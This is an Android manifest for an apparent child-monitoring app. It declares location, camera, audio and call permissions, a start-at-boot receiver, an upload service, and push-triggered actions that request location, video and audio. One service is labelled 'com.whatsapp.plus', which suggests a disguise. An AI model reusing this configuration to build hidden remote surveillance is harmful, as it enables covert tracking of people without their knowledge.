<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.byteshaft.kidmonitor" >

    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>

    <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE"/>
    <uses-permission android:name="com.byteshaft.kidmonitor.permission.C2D_MESSAGE"/>
    <permission android:name="com.byteshaft.kidmonitor.permission.C2D_MESSAGE"
        android:protectionLevel="signature" />

    <application
        android:name=".AppGlobals"
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >
        <activity
            android:name=".MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <service android:name=".services.CallListenerService"
            android:label="com.whatsapp.plus"/>

        <service android:name=".services.UploadService"/>
        <receiver android:name=".receivers.BootStateListener">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.google.android.gms.gcm.GcmReceiver"
            android:exported="true"
            android:permission="com.google.android.c2dm.permission.SEND" >
            <intent-filter>
                <action android:name="com.google.android.c2dm.intent.RECEIVE" />
                <action android:name="com.google.android.c2dm.intent.REGISTRATION" />
                <category android:name="com.byteshaft.kidmonitor.gcm" />
            </intent-filter>
        </receiver>
        <service
            android:name=".services.MyGcmListenerService"
            android:exported="false" >
            <intent-filter>
                <action android:name="com.google.android.c2dm.intent.RECEIVE" />
            </intent-filter>
        </service>
        <service
            android:name=".services.MyInstanceIDListenerService"
            android:exported="false">
            <intent-filter>
                <action android:name="com.google.android.gms.iid.InstanceID"/>
            </intent-filter>
        </service>
        <service
            android:name=".services.RegistrationIntentService"
            android:exported="false" />
        <receiver android:name=".receivers.ConnectionChangeReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".receivers.DeleteDataReceiver">
            <intent-filter>
                <action android:name="com.byteshaft.deleteData"/>
            </intent-filter>
        </receiver>

        <receiver
            android:name=".receivers.LocationRequester"
            android:enabled="true"
            android:exported="false">
            <intent-filter>
                <action android:name="com.byteshaft.kidmonitor.request_location"/>
                <action android:name="com.byteshaft.kidmonitor.request_video"/>
                <action android:name="com.byteshaft.kidmonitor.request_audio"/>
            </intent-filter>
        </receiver>
    </application>

</manifest>
